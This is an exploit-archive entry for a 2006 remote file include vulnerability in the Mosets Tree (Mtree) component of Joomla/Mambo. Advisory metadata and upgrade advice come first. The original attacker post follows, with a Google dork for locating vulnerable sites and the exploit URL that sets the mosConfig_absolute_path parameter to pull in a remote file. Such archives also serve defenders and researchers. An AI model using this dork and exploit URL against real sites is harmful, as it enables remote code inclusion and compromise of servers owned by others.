Joomla Mosets Tree - exploit.company

vendor:

Mosets Tree

by:

Crackers_Child

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Mosets Tree

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Joomla Mosets Tree <= 1.0 Remote File Include Vulnerability

A remote file include vulnerability exists in Joomla Mosets Tree <= 1.0. An attacker can exploit this vulnerability to include arbitrary files from remote locations by sending a specially crafted request to the vulnerable application.

Mitigation:

Upgrade to the latest version of Joomla Mosets Tree.

Source

Exploit-DB raw data:

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------

Title : Joomla Mosets Tree <= 1.0 Remote File Include Vulnerability

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: crackers_child@sibersavascilar.com

--------------------------------------------------------------------------------

Google Dorks  : inurl:"/com_mtree/"

------------------------- -------------------------------------------------------

Application :  Mtree  Component of Mambo

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Exploit:

http://[target]/[mambo_path]/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=

--------------------------------------------------------------------------------

greets:

All My Friends And SiberSavascilar.Com Members !

--------------------------------------------------------------------------------



--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------

# milw0rm.com [2006-08-17]